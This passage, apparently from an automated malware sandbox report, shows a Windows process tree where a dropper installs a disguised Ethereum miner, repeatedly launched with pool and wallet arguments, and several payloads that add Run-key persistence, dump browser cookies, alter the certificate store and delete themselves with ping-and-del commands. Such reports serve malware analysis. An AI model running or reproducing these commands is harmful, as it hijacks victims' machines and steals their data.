                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                            4⤵
                                                                                                                              PID:5360
                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                              4⤵
                                                                                                                                PID:3316
                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                4⤵
                                                                                                                                  PID:4408
                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                  4⤵
                                                                                                                                    PID:4268
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                    4⤵
                                                                                                                                      PID:5524
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                      4⤵
                                                                                                                                        PID:3744
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                        4⤵
                                                                                                                                          PID:5484
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                          4⤵
                                                                                                                                            PID:2816
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                            4⤵
                                                                                                                                              PID:6000
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                              4⤵
                                                                                                                                                PID:5656
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                4⤵
                                                                                                                                                  PID:5196
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4280
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4148
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1340
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4704
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5124
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5432
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4444
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5284
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4548
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5452
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4324
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5872
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4960
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:6136
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1220
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:5340
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:5344
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:5448
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:5692
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4432
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:4244
                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:68
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:740
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-6S1FT.tmp\Install.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-6S1FT.tmp\Install.tmp" /SL5="$70048,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                          PID:3932
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-RGRTA.tmp\Ultra.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-RGRTA.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                            PID:496
                                                                                                                                                                                            • C:\Program Files\Windows Defender\AHHAXDEDNF\ultramediaburner.exe
                                                                                                                                                                                              "C:\Program Files\Windows Defender\AHHAXDEDNF\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                              PID:776
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-RS6FJ.tmp\ultramediaburner.tmp
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-RS6FJ.tmp\ultramediaburner.tmp" /SL5="$A004A,281924,62464,C:\Program Files\Windows Defender\AHHAXDEDNF\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:3488
                                                                                                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:2256
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\43-5619c-7d0-c99ac-2a74ef2e42360\Qojonishipe.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\43-5619c-7d0-c99ac-2a74ef2e42360\Qojonishipe.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:1420
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\70-a18a7-0b1-7d18f-64585db285732\Nemyzhesholu.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\70-a18a7-0b1-7d18f-64585db285732\Nemyzhesholu.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                              PID:3936
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sjhlt04q.sis\sskiper.exe /s & exit
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:4624
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\sjhlt04q.sis\sskiper.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\sjhlt04q.sis\sskiper.exe /s
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                  PID:4888
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1886677780.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1886677780.exe
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:4468
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1661024276.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1661024276.exe
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5536
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\sjhlt04q.sis\sskiper.exe & exit
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:4792
                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                        ping 0
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                        PID:5156
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dwydkbnm.ub2\KiffMainE1.exe & exit
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                  PID:6140
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\dwydkbnm.ub2\KiffMainE1.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\dwydkbnm.ub2\KiffMainE1.exe
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:2068
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zzkjp1j0.0ko\001.exe & exit
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:4296
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\zzkjp1j0.0ko\001.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\zzkjp1j0.0ko\001.exe
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:4716
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\myeu53qg.y2p\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:4420
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\myeu53qg.y2p\installer.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\myeu53qg.y2p\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                        PID:5076
                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\myeu53qg.y2p\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\myeu53qg.y2p\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619853944 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:4572
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wh3b2ffl.jls\gpooe.exe & exit
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:5032
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\wh3b2ffl.jls\gpooe.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\wh3b2ffl.jls\gpooe.exe
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                            PID:5236
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:5432
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:5716
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12eiml2h.tqk\google-game.exe & exit
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:5744
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\12eiml2h.tqk\google-game.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\12eiml2h.tqk\google-game.exe
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                              PID:5888
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:6000
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\codiigfb.eri\y1.exe & exit
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:4120
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\codiigfb.eri\y1.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\codiigfb.eri\y1.exe
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:4840
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1cQgVJHqYu.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1cQgVJHqYu.exe"
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                                  PID:2956
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1620113315974.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1620113315974.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620113315974.txt"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:4336
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1cQgVJHqYu.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:5372
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                        ping 127.0.0.1 -n 3
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                        PID:5408
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
